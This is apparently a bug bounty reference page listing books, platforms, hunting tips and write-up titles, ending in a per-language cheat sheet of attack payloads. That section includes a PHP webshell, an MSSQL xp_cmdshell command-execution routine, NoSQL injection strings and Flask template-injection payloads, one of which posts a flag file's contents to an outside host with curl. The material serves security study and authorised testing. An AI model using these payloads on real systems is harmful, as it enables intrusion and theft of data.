Introduction
My intention is to make a full and complete list of vulnerability bounty write-ups and resources, so that bug bounty hunters can use this page as a reference when they want to gain some insight into a particular kind of vulnerability during bug hunting. Feel free to submit a request. Okay, enough chit-chatting, let's get started.
Books
- Getting Started - Bug Bounty Hunter Methodology
- zseano’s methodology
- Web Hacking 101 by Peter Yaworski.
- Breaking into Information Security: Learning the Ropes 101 by Andy Gill.
- The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws by Dafydd Stuttard and Marcus Pinto.
- Tangled Web by Michal Zalewski.
- OWASP Testing Guide v4 by OWASP Breakers community.
Mobile
- The Mobile Application Hacker’s Handbook by Dominic Chell et al.
- iOS Application Security: The Definitive Guide for Hackers and Developers by David Thiel.
Cryptography
- Crypto 101 by Laurens Van Houtven.
Penetration Testing
- The Art of Exploitation by Jon Erickson, 2008
- Metasploit: The Penetration Tester’s Guide by David Kennedy et al., 2011
- Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
- Rtfm: Red Team Field Manual by Ben Clark, 2014
- The Hacker Playbook by Peter Kim, 2014
- The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
- Professional Penetration Testing by Thomas Wilhelm, 2013
- Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
- Violent Python by TJ O’Connor, 2012
- Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007
- Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014
- Penetration Testing: Procedures & Methodologies by EC-Council, 2010
- Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010
- Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014
- Bug Hunter’s Diary by Tobias Klein, 2011
- Advanced Penetration Testing by Wil Allsopp, 2017
Platforms
- YesWeHack
- intigriti
- HackerOne
- Bugcrowd
- Cobalt
- Bountysource
- Bounty Factory
- Coder Bounty
- FreedomSponsors
- FOSS Factory
- Synack
- HackenProof
- Detectify
- Bugbountyjp
- Safehats
- BugbountyHQ
- Hackerhive
- Hacktrophy
- AntiHACK
- CESPPA
Bug-Bounty-Tips
Tip #1
Use Git as a recon tool. Find the target's Git repositories, clone them, and then check the logs for information on the team that is not necessarily in the source code. Say the target is Reddit and I want to see which developers work on certain projects.
Tip #2
Look for GitLab instances on targets or belonging to the target. When you stumble across the GitLab login panel, navigate to /explore. Misconfigured instances do not require authentication to view the internal projects. Once you get in, use the search function to find passwords, keys, etc. This is a pretty big attack vector and I am finally revealing it today, because I am sure it will help a lot of you get some critical issues.
Tip #3
Bug bounty tip: test a company's applications that cost money or require manual setup. Chances are that few or no other hunters have tested them, leaving them vulnerable.
Tip #4
If you've found an IDOR where you're able to change other users' data, don't jump out of your seat to report it; first modify it with an XSS payload. If inputs are not sanitized and variables are echoed without being escaped, then IDOR > XSS > ATO.
Tip #5
Look for hackathon-related assets. What I mean by this is that sometimes companies run hackathons and give attendees special access to certain API endpoints and/or temporary credentials. Several times I have found Git instances set up for hackathons that were full of information allowing me to find more issues in the target.
Tip #6
Keep all your directory brute force results, so that when a CVE like Drupalgeddon2 comes out you can look for previously found instances (cat dirsearch/reports/*/* | grep INSTALL.mysql.txt | grep 200 | less).
Tip #7
When you have a form, always try to change the request method from POST to GET in order to improve the CVSS score. For example, demonstrating that a CSRF can be exploited simply with an [img] tag is better than having to send a link to the victim.
Vulnerabilities
Cross-Site Scripting (XSS)
- Sleeping stored Google XSS Awakens a $5000 Bounty by Patrik Fehrenbach
- RPO that lead to information leakage in Google by filedescriptor
- God-like XSS, Log-in, Log-out, Log-in in Uber by Jack Whitton
- An XSS on Facebook via PNGs & Wonky Content Types by Jack Whitton
- (he is able to turn a stored XSS on an unrelated domain into XSS on the main facebook domain)
- Stored XSS in *.ebay.com by Jack Whitton
- Complicated, Best Report of Google XSS by Ramzes
- Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com by secgeek
- Command Injection in Google Console by Venkat S
- Facebook’s Moves - OAuth XSS by PAULOS YIBELO
- Stored XSS in Google Docs (Bug Bounty) by Harry M Gertos
- Stored XSS on developer.uber.com via admin account compromise in Uber by James Kettle (albinowax)
- Yahoo Mail stored XSS by Klikki Oy
- Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212) by Masato Kinugawa
- Youtube XSS by fransrosen
- Best Google XSS again - by Krzysztof Kotowicz
- IE & Edge URL parsing Problem - by detectify
- Google XSS subdomain Clickjacking
- Google Japan Book XSS
- Flash XSS mega nz - by frans
- xss in google IE, Host Header Reflection
- Years ago Google xss
- xss in google by IE weird behavior
- xss in Yahoo Fantasy Sport
- xss in Yahoo Mail Again, worth $10000 by Klikki Oy
- Sleeping XSS in Google by securityguard
- Decoding a .htpasswd to earn a payload of money by securityguard
- Google Account Takeover
- AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2 by geekboy
- Uber Self XSS to Global XSS
- How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) by Marin Moulinier
- Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities by Brett
- XSSI, Client Side Brute Force
- postMessage XSS Bypass
- XSS in Uber via Cookie by zhchbin
- Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP by frans
- XSS due to improper regex in third party js Uber 7k XSS
- XSS in TinyMCE 2.4.0 by Jelmer de Hen
- Pass unencoded URL in IE11 to cause XSS
- Twitter XSS by stopping redirection and javascript scheme by Sergey Bobrov
- Auth DOM Uber XSS
- XSS in www.yahoo.com
- Stored XSS, and SSRF in Google using the Dataset Publishing Language
- Stored XSS on Snapchat
- Researching Polymorphic Images for XSS on Google Scholar
- OLX Bug Bounty: Reflected XSS in 404 Page
Brute Force
- Web Authentication Endpoint Credentials Brute-Force Vulnerability by Arne Swinnen
- InstaBrute: Two Ways to Brute-force Instagram Account Credentials by Arne Swinnen
- How I Could Compromise 4% (Locked) Instagram Accounts by Arne Swinnen
- Possibility to brute force invite codes in riders.uber.com by r0t
- Brute-Forcing invite codes in partners.uber.com by Efkan Gökbaş (mefkan)
SQL Injection
- SQL injection in Wordpress Plugin Huge IT Video Gallery in Uber by glc
- SQL Injection on sctrack.email.uber.com.cn by Orange Tsai
- Yahoo – Root Access SQL Injection – tw.yahoo.com by Brett Buerhaus
- Multiple vulnerabilities in a WordPress plugin at drive.uber.com by Abood Nour (syndr0me)
- GitHub Enterprise SQL Injection by Orange
- Yahoo SQL Injection to Remote Code Execution to Root Privilege by Ebrahim Hegazy
Stealing Access Token
- Facebook Access Token Stolen by Jack Whitton
- Obtaining Login Tokens for an Outlook, Office or Azure Account by Jack Whitton
- Bypassing Digits web authentication’s host validation with HPP by filedescriptor
- Bypass of redirect_uri validation with /../ in GitHub by Egor Homakov
- Bypassing callback_url validation on Digits by filedescriptor
- Stealing livechat token and using it to chat as the user - user information disclosure by Mahmoud G. (zombiehelp54)
- Change any Uber user’s password through /rt/users/passwordless-signup - Account Takeover (critical) by mongo (mongo)
- Internet Explorer has a URL problem, on GitHub by filedescriptor.
- How I made LastPass give me all your passwords by labsdetectify
- Steal Google Oauth in Microsoft
- Steal FB Access Token
- Paypal Access Token Leaked
- Steal FB Access Token
- Appengine Cool Bug
- Slack post message real life experience
- Bypass redirect_uri by nbsriharsha
- Stealing Facebook Messenger nonce worth 15k
- Steal Oculus Nonce and Oauth Flow Bypass
- Google oauth bypass
CSRF
- Messenger.com CSRF that show you the steps when you check for CSRF by Jack Whitton
- Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) by Florian Courtial
- Hacking PayPal Accounts with one click (Patched) by Yasser Ali
- Add tweet to collection CSRF by vijay kumar
- Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun by phwd
- How I Hacked your Beats account? Apple Bug Bounty by @aaditya_purani
- FORM POST JSON: JSON CSRF on POST Heartbeats API by Dr.Jones
- Hacking Facebook accounts using CSRF in Oculus-Facebook integration
Remote Code Execution
- JDWP Remote Code Execution in PayPal by Milan A Solanki
- XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook’s servers by Reginaldo Silva
- How I Hacked Facebook, and Found Someone’s Backdoor Script by Orange Tsai
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! by Orange Tsai
- uber.com may RCE by Flask Jinja2 Template Injection by Orange Tsai
- Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution by Orange Tsai (Sorry, it's in Chinese only)
- How we broke PHP, hacked Pornhub and earned $20,000 by Ruslan Habalov
- (Alert: god-like write-up; make sure you know what ROP is before clicking, which I don't =( )
- RCE deal to tricky file upload by secgeek
- WordPress SOME bug in plupload.flash.swf leading to RCE in Automatic by Cure53 (cure53)
- Read-Only user can execute arbitrary shell commands on AirOS by 93c08539 (93c08539)
- Remote Code Execution by image upload! by Raz0r (ru_raz0r)
- Popping a shell on the Oculus developer portal by Bitquark
- Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$ by 5haked
- PayPal Node.js code injection (RCE) by Michael Stepankin
- eBay PHP Parameter Injection lead to RCE
- Yahoo Acquisition RCE
- Command Injection Vulnerability in Hostinger by @alberto__segura
- RCE in Airbnb by Ruby Injection by buerRCE
- RCE in Imgur by Command Line
- RCE in git.imgur.com by abusing out dated software by Orange Tsai
- RCE in Disclosure
- Remote Code Execution by Struts2 on a Yahoo Server
- Command Injection in Yahoo Acquisition
- $50k RCE in JetBrains IDE
- Telekom.de Remote Command Execution! by Ebrahim Hegazy
- Magento Remote Code Execution Vulnerability! by Ebrahim Hegazy
- Yahoo! Remote Command Execution Vulnerability by Ebrahim Hegazy
Deserialization
- Java Deserialization in manager.paypal.com by Michael Stepankin
- Instagram’s Million Dollar Bug by Wesley Wineberg
- Ruby Cookie Deserialization RCE on facebooksearch.algolia.com by Michiel Prins (michiel)
- Java deserialization by meals
Image Tragick
- Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition) by NaHamSec
- Exploiting ImageMagick to get RCE on HackerOne by c666a323be94d57
- Trello bug bounty: Access server’s files using ImageTragick by Florian Courtial
- 40k fb rce
- Yahoo Bleed 1
- Yahoo Bleed 2
Direct Object Reference (IDOR)
- Trello bug bounty: The websocket receives data when a public company creates a team visible board by Florian Courtial
- Trello bug bounty: Payment information is sent to the webhook when a team changes its visibility by Florian Courtial
- Change any user’s password in Uber by mongo
- Vulnerability in Youtube allowed moving comments from any video to another by secgeek
- (it's a Google vulnerability, so it's worth reading, as Google vulnerabilities are generally more difficult to find)
- Twitter Vulnerability Could Credit Cards from Any Twitter Account by secgeek
- One Vulnerability allowed deleting comments of any user in all Yahoo sites by secgeek
- Microsoft-careers.com Remote Password Reset by Yaaser Ali
- How I could change your eBay password by Yaaser Ali
- Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication by Duo Labs
- How I got access to millions of [redacted] accounts
- All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description by Enguerran Gillier (opnsec)
- Urgent: attacker can access every data source on Bime by Jobert Abma (jobert)
- Downloading password protected / restricted videos on Vimeo by Gazza (gazza)
- Get organization info based on uuid in Uber by Severus (severus)
- How I Exposed your Primary Facebook Email Address (Bug worth $4500) by Roy Castillo
- DOB disclosed using “Facebook Graph API Reverse Engineering” by Raja Sekar Durairaj
- Change the description of a video without publish_actions permission in Facebook by phwd
- Response To Request Injection (RTRI) by ? (to be honest, thanks to this article I have found quite a few bugs by using this method; respect to the author!)
- Leak of all project names and all user names, even across applications on Harvest by Edgar Boda-Majer (eboda)
- Changing paymentProfileUuid when booking a trip allows free rides at Uber by Matthew Temmy (temmyscript)
- View private tweet
- Hacking Facebook's Legacy API, Part 1: Making Calls on Behalf of Any User by Stephen Sclafani
- Hacking Facebook's Legacy API, Part 2: Stealing User Sessions by Stephen Sclafani
- Delete FB Video
- Viewing private Airbnb Messages
- IDOR tweet as any user by kedrisec
- Mass Assignment, Response to Request Injection, Admin Escalation by sean
- Getting any Facebook user’s friend list and partial payment card details
- Manipulation of ETH balance
XXE
- How we got read access on Google’s production servers by detectify
- Blind OOB XXE At UBER 26+ Domains Hacked by Raghav Bisht
- XXE through SAML
- XXE in Uber to read local files
Unrestricted File Upload
- File Upload XSS in image uploading of App in mopub by vijay kumar
- RCE deal to tricky file upload by secgeek
- File Upload XSS in image uploading of App in mopub in Twitter by vijay kumar (vijay_kumar1110)
Server Side Request Forgery (SSRF)
- ESEA Server-Side Request Forgery and Querying AWS Meta Data by Brett Buerhaus
- SSRF to pivot internal network
- SSRF to LFI
- SSRF to query google internal server
- SSRF by using third party Open redirect by Brett Buerhaus
- SSRF tips from BugBountyHQ of Images
- SSRF to RCE
- XXE at Twitter
- Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface
- Plotly AWS Metadata SSRF (and a stored XSS)
Race Condition
- Race conditions on Facebook, DigitalOcean and others (fixed) by Josip Franjković
- Race Conditions in Popular reports feature in HackerOne by Fábio Pires (shmoo)
- Hacking Starbuck for unlimited money by Egor Homakov
Business Logic Flaw
- How I Could Steal Money from Instagram, Google and Microsoft by Arne Swinnen
- Facebook - bypass ads account’s roles vulnerability 2015 by POUYA DARABI
- Uber Eat for Free by
Authentication Bypass
- OneLogin authentication bypass on WordPress sites via XMLRPC in Uber by Jouko Pynnönen (jouko)
- 2FA PayPal Bypass by henryhoggard
- SAML Bug in Github worth 15000
- Authentication bypass on Airbnb via OAuth tokens theft
- Administrative Panel Access by c0rni3sm
- Flickr Oauth Misconfiguration by mishre
- Slack SAML authentication bypass by Antonio Sanso
- Shopify admin authentication bypass using partners.shopify.com by uzsunny
HTTP Header Injection
- Twitter Overflow Trilogy in Twitter by filedescriptor
- Twitter CRLF by filedescriptor
- Adblock Plus and (a little) more in Google
- $10k host header by Ezequiel Pereira
Subdomain Takeover
- Hijacking tons of Instapage expired users Domains & Subdomains by geekboy
- Reading Emails in Uber Subdomains
- Slack Bug Journey - by David Vieira-Kurz
- Subdomain takeover and chain it to perform authentication bypass by Arne Swinnen
- Hacker.One Subdomain Takeover - by geekboy
XSSI
- Plain Text Reading by XSSI
- JSON hijacking
- OWASP XSSI
- Japan Identifier based XSSI attacks
- JSON Hijack Slide
Email Related
- This domain is my domain - G Suite A record vulnerability
- I got emails - G Suite Vulnerability
- How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]
- Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]
- Slack Yammer Takeover by using TicketTrick by Inti De Ceukelaire
- How I could have mass uploaded from every Flickr account!
Money Stealing
Local File Inclusion
- Disclosure Local File Inclusion by Symlink
- Facebook Symlink Local File Inclusion
- Gitlab Symlink Local File Inclusion
- Gitlab Symlink Local File Inclusion Part II
- Multiple Company LFI
- LFI by video conversion, excited about this trick!
Miscellaneous
- SAML Pen Test Good Paper
- A list of FB writeups collected by phwd
- NoSQL Injection by websecurify
- CORS in action
- CORS in Fb messenger
- Web App Methodologies
- XXE Cheatsheet
- The road to hell is paved with SAML Assertions, Microsoft Vulnerability
- Study this if you'd like to learn Mongo SQL Injection by cirw
- Mongo DB Injection again by websecurify
- w3af speech about modern vulnerability by w3af
- Web cache attack that led to account takeover
- A talk to teach you how to use SAML Raider
- XSS Checklist when you have no idea how to exploit the bug
- CTF write up, Great for Bug Bounty
- It turns out every site using jQuery Mobile together with an open redirect is vulnerable to XSS by sirdarckcat
- Bypass CSP by using google-analytics
- Payment Issue with Paypal
- Browser Exploitation in Chinese
- XSS bypass filter
- Improper Markup Sanitization
- Breaking XSS mitigations via Script Gadget
- X41 Browser Security White Paper
- Bug Bounty Cheatsheets By EdOverflow
- Messing with the Google Buganizer System for $15,600 in Bounties
- Electron Security White Paper
- Twitter’s Vine Source code dump - $10080
- SAML Bible
- Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G
- Smart Contract Vulnerabilities
Vulnerabilities-types
Client side:
XSS
CSRF
session fixation
open redirects
header injection
websockets / localStorage tests
websockets hijacking
jsonp leaks
OAuth token theft
path-relative stylesheet import
same origin method execution
http response splitting/smuggling
names and email addresses appearing in HTML comments
reverse tabnabbing
referer token leakage
Server side:
Injections:
+ sql / nosql
+ cmd
+ expression language (https://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf)
+ template injection
+ Server Side Include (.shtml)
+ server side javascript execution
+ ldap
+ CSS
+ extract attributes with input[value^=""]
+ extract whatever with fonts (https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
+ mail header
+ xpath
+ log injection
+ OGNL
SSRF
XXE
misconfig:
+ cors
+ host header manipulation
+ host header poisoning (https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html)
+ TRACE enabled
+ clickjacking
+ session timeouts
+ login throttling (anti-bruteforce)
+ _method=PUT etc checks (csrf bypass...)
+ cross-domain policy
+ cookie scope
+ sensitive data in url
+ directory listings
+ caching of sensitive data
+ backdoor cookies/parameters
+ SMTP not checking server identity
+ methods not checked/restricted (GET, PUT etc)
path traversal
local/remote file inclusion
file upload
auth bypass
+ pass reset: the same token for all users (in given second)
parameter pollution
race conditions
user enumeration
mass assignments / autobinding / Object injection
regex bypass/eval/DoS (e.g. ([a-zA-Z]+)*, (a+)+ or (a|a?)+)
search indexing of credentials (private data cached by google etc)
memory leaks:
- https://github.com/neex/gifoeb
subdomain takeover:
- unused subdomains and aliases (CNAME)
- CNAME pointing to an unregistered domain
- trailing dots (bypasses in cloud providers)
password bruteforce
- https://hackerone.com/reports/127844
httpoxy (mostly php 7.0.8)
path equivalence vulnerability
ImageTragick
insecure direct object reference
session puzzling
smtp header injection
deserialization
rounding errors / integer overflows
cache-deception
table truncation
hidden files (.git, .DS_Store)
broken logout functions
format string (%s, %d, {0:x})
bad hexadecimal concatenation (when two different hashes are converted to the same value)
null byte injection
pdf export injection (https://securityonline.info/export-injection-new-server-side-vulnerability/)
csv injection
side-channel leaks with e.g. Chrome Auditor or Windows Defender (https://github.com/icchy/wctf2019-gtf)
old (open)ssl
utf8 normalization/Case Mapping Collisions (utf.toLower() == some_ascii) (https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/)
Languages
PHP
- file extensions (most servers parse them as php)
- .pht
- .phtml
- php3
- php4
- non-common php tags
```php
<script language="php"></script>
<% %>
<?=
```
- shell without letters/numbers
```php
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);
# <?=$_GET[_]($_GET[__]);
```
- parse_url function
- readfile + windows -> filenames blacklist bypass via 8.3 filenames
- preg_match -> bypass via pcre.backtrack_limit
- create text that will force recursion in the vulnerable regex
- it will fail with a warning (returning false, which == 0), possibly bypassing protections like
```php
if(preg_match("", $_POST['input']) == 0) {
    // process user input...
}
```
- type juggling / weak comparison operator
- base_dir bypass:
- SplFileObject
```php
$file = new SplFileObject("/var/www/html/blabla/test.php", "w"); $file->fwrite('shell');
```
- pcntl_exec
```php
pcntl_exec("/bin/bash", "&pkill -9 bash >out");echo file_get_contents("out");
```
- linkinfo, realpath <= 5.3.6
- symlinks
- mail() + logs
- chdir(base_dir,…)
```php
ini_set('open_basedir','..');chdir('..');chdir('..');ini_set('open_basedir','/');
```
- disable_functions bypass
- disallow file write access bypass
- code evaluation
- complex (curly) syntax
- heredoc syntax
- user-supplied values in double-quotes
- eval
- create_function
- preg_replace with /e
- assert is eval
- extract is evil
```
&q=fake&sql=fake&query=fake&db=fake&host=fake
```
- object instantiation
```php
$model = $_GET['model'];
$object = new $model();
```
- unlink with the wrong folder doesn't work? (https://rdot.org/forum/showthread.php?t=3102)
- image resize bypass
- basic auth with vulnerable <limit> bypass
- LFI/RFI wrappers
- input
- data
data://text/plain;base64,command | data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
- filter
php://filter/convert.base64-encode/resource=index.php
- file
- zip
zip://zipfile#php_file.php
- phar
- expect
- glob
- iconv
- crypto
- gopher
- fd
- telnet
- ftp
- tftp
- nntp
- jar
- scp
- ssh
- ssh2
- ldap
- dict
- ogg
- LFI to RCE
- Using file upload forms/functions
- Wrappers
- Files
- /proc/self/environ
- /proc/self/fd
- Log files with controllable input:
- /var/log/apache2/access.log
- /var/log/apache2/error.log
- /var/log/vsftpd.log
- /var/log/sshd.log
- /var/log/mail
- /var/lib/nginx/cache
- PHPInfo script
- php sessions
- Endings:
- null byte
- truncation
- tmp files with self inclusion
- common files
- phpunit.xml.dst (in LAMP)
- webshell using POST files
<? `. /*/*J;` // will execute when there is /tmp/*J file with your POST data
- Inject SESSION data
curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah' -F 'file=@/etc/passwd'
Java
- /jmx-console
- /web-console/Invoker
- /invoker/JMXInvokerServlet and /invoker/EJBInvokerServlet
- Java Naming and Directory Service at ports 1098, 1099
- RMI at port 4444, 1099
- directly accessible jsp files (vs struts actions)
- struts
- dmi:
```
?method:somePublicMethodToCall=1, /action!method.do?username=value
```
- extensions: .action, .do, .go
- actions with user controlled input, like:
```xml
<action name="someAction" class="com.SomeAction" method="DoSomething">
  <result name="typeResult" type="dispatcher">
    <param name="location">/resources/${theType}.jsp</param>
  </result>
</action>
```
Now read files with ?method:getAnyString&anyString=typeResult&theType=../WEB-INF/web.xml?
- getText(user_input) -> ognl injection
- dmi:
- spring
- mass assignment because of @ModelAttribute (http://agrrrdog.blogspot.com/2017/03/autobinding-vulns-and-spring-mvc.html)
- injections:
```
%{3*2} ${3*5} ${%{4*5}} ${T(java.lang.Runtime).getRuntime().exec("cmd.exe")}
```
- jsessionid in url parameter rewritten into the response (html response splitting)
- regexes to check
```
java.lang.ClassLoader.defineClass
java.net.URLClassLoader
java.beans.Introspector.getBeanInfo
openConnection
getResource
java.io.FileInputStream
java.io.FileOutputStream
java.io.FileReader
java.io.FileWriter
java.io.RandomAccessFile
System.load
System.loadLibrary
exec
ProcessBuilder
getRuntime
ObjectInputStream
readObject
readObjectNoData
readResolve
readExternal
XMLDecoder
xstream.fromXML
ObjectInputStream.readUnshared
enableDefaultTyping
JsonTypeInfo.Id.CLASS
JsonTypeInfo.Id.MINIMAL_CLASS
freemarker.template.Template
javax.script.ScriptEngine.eval
ServletDispatcherResult
createNativeQuery
isELIgnored=false
getELContext
createValueExpression
parseExpression
ognlUtil.getValue
ScriptEngineManager
ELAsString
spring:eval
SSLContext.getInstance("SSL") -> SSLContext.getInstance("TLS")
getSession().setAttribute
```
- sonar rules
```
LDAP serialization entities
Persistent entities with @RequestMapping
```
- jsp include injection
```jsp
<%@include file="" %>
<jsp:include page=""/>
```
- server side redirects
```java
request.getRequestDispatcher("./"+user_input+".jsp").include(request, response) // with user_input == "applicationContext.xml?"
return new ModelAndView(user_input);
return new ActionForward(user_input);
```
SQL
- hex encoding
- union select X'31333337' -> union select 1337
- charsets big5, cp932, gb2312, gbk and sjis
- Hibernate + H2 db: non-breaking-space is not recognized by Hibernate
- WAF bypass with %0b, %0c, %0a, /**/, like that: sel%0bect
- mssql (T-SQL)
```sql
# rce
EXEC master..sp_configure 'show advanced options',1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'xp_cmdshell',1;
RECONFIGURE WITH OVERRIDE;
EXEC master..sp_configure 'show advanced options',0;
RECONFIGURE WITH OVERRIDE;
DECLARE @result TABLE (asd VARCHAR(512));
declare @cmd nvarchar(1000);
DECLARE @data VARCHAR(8000);
set @cmd = \''''+cmd+'''\';
INSERT INTO @result execute xp_cmdshell @cmd;
SELECT @data = asd FROM @result;
SELECT 'output: '+@data AS output INTO rce_result;

# hex encoded payload execute
DECLARE @S VARCHAR(4000);
SET @S=CAST(payload_in_hex AS VARCHAR(4000));
EXEC(@S);
```
- bypass comments
```sql
select * from x where /*!user='admin'*/ -> or /*+*/
```
- unicode in mysql
```sql
mysqli_set_charset($conn,"utf8"); select 'admin' = 'àdmin'; # will return 1
```
NOSql
- arrays:
```
{"$gt": ""}, &input[$ne]=1
```
- horizontal auth bruteforce:
```
user[$in][]=admin&user[$in][]=user&pass=abc123 ; {user: {"$in": ["admin", "user"]}}
user[$regex]=a&pass=abc123
```
- db.run(user input) is like classical SQL injection; JavaScript code can execute within the database engine inside:
- $where
- group
- map-reduce
- protection:
- getting rid of the qs module
- payloads:
```
# mostly from https://github.com/cr0hn/nosqlinjection_wordlists/blob/master/mongodb_nosqli.txt
(function(){var date = new Date(); do{curDate = new Date();}while(curDate-date<10000); return Math.max();})()
'0; return true'
'0; while(true){}'
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
```
Python
- url_parse in python has a problem with path params (http://example.com?asd;xxx)
- upload __init__.py file + import
- app.secret_key in flask -> you know it, you can spoof session cookies
- flask SSTI: from_string, render_template_string; templates with a non-common extension have auto-escaping disabled
- flask sqlalchemy injection: sqlalchemy.expression.text, execute
- flask threading: g and _context_ are tricky
- flask uses its error pages only for specified addresses, including 127.0.0.1
- flask rce payloads
```
{% for x in {}.__class__.__base__.__subclasses__() %}{% if hasattr(x,'_module') %}{{x._module.__builtins__['__import__']('os').system("ls")}}{% endif %}{% endfor %}

{% set loadedClasses = " ".__class__.__mro__[2].__subclasses__() %}
{% for loadedClass in loadedClasses %}
{% if loadedClass.__name__ == "catch_warnings".strip() %}
{% set builtinsReference = loadedClass()._module.__builtins__ %}
{% set os = builtinsReference["__import__".strip()]("subprocess".strip()) %}
{{ os.check_output("cat sha4/flag_bilaabluagbiluariglublaireugrpoop".strip(), shell=True) }}
{% endif %}
{% endfor %}

{{config}}
{{ url_for.globals.current_app.config }}

{% for key in ''['__class__']['__mro__'][1]['__subclasses__']() %}
{% if key['__name__'] == "Popen" %}
{% if key("curl 908337901:8001 -d $(/readflag)", shell=True, stdout=-1)['communicate']()[0] %}
{% endif %}
{% endif %}
{% endfor %}
```
- objects comparison (Python 2): "1">5 -> True
- format is exploitable: '{your_input}'.format(some_python_object), like '{0.__class__}'.format(object)
- web cache dirs:
```
/__pycache__/__init__.cpython-35.pyc
/__pycache__/conf.cpython-35.pyc
/__pycache__/app.cpython-35.pyc
```
- Werkzeug debugger
- we can replace '\x0a' with '\x0d' and it will still be a correct Python script (useful when getting code in with input())
- it's possible to send URL-encoded data as the path, i.e. "GET /%41%41%41 HTTP/1.1" == "GET /AAA HTTP/1.1" (at least in the flask dev server)
- default args are evaluated only once
```python
def foo(a=[]):
    a.append("X")
    return a

In [1]: foo()
Out[1]: ['X']
In [2]: foo()
Out[2]: ['X', 'X']
```
- exception handling: except ValueError, IndexError: will catch only ValueError (Python 2 syntax, equivalent to except ValueError as IndexError)
- numpy does not always clear memory, e.g. np.empty()
Ruby
- URI(params[:url]).scheme == 'http' bypass by creating an 'http' dir
- open(params[:url]) -> rce with |ls
Perl
- params pollution ($x=asd&$x=fre -> array); dicts are expanded with arrays
- can be broken in many ways: Camel, Camel strikes back
Bash
- no white spaces:
```bash
{echo,a,b}; echo${IFS}a${IFS}b
```
- num bases
```bash
echo "obase=16; 11" | bc
$((16#111))
```
- cmd without letters/numbers
```bash
/???/??? ./
# /bin/cat ./
```
- Bash reads scripts in chunks (https://thomask.sdf.org/blog/2019/11/09/take-care-editing-bash-scripts.html), so editing a script while it is running may cause some problems.
node.js
- creating Buffer(x) with x as a number creates a Buffer with x bytes of uninitialized memory -> memory leak
- eval, setTimeout, setInterval, unserialize, exec
- parameter pollution: params are concatenated with ","
- payloads
```javascript
require('fs').readFile('/etc/passwd',function(err,data){if(!err){res.end(data.toString())}})
```
- check for debug mode: https://app/%2
- comparison operators: == doesn't check types
- anti-XSS: npm install html-entities
- find vulnerable packages: snyk, node-check, nsp
- static code analysis: NodeJsScan
- SQLi with brackets and template filters:
```javascript
correct: const result = await req.db.all `SELECT id, title FROM notes WHERE id = ${req.params.noteId}`;
vuln:    const result = await req.db.run(`SELECT id, title FROM notes WHERE id = ${req.params.noteId}`);
```
- utf8 path traversal
```javascript
var path = req.query.path;
if (path.indexOf("..") == -1) {
    get_cos(path, callback);
}
// http://example.pl/sandbox/NN/passwd // N to U+FF2E
```
- square brackets with user data are vuln:
```javascript
whatever[user_input] = user_input2
```
- best practices
React/Electron
XSSes (cheatsheet)
ReactDOM.render(payload_here, something)
- Control over tag/props/children:
```
userInput.tag, [userInput.props] [...userInput.children] ) is the same as: <userInput.tag {...userInput.props}>{userInput.children}</userInput.tag>
```
<script>window.__STATE__ = ${JSON.stringify({ data })}</script>
<a href="payload_here"></a> (src, srcdoc, ...)
dangerouslySetInnerHTML
React.useRef
- DOM manipulation
GraphQL
ASP NET (dotnet)
- insecure JSON deserialization with TypeNameHandling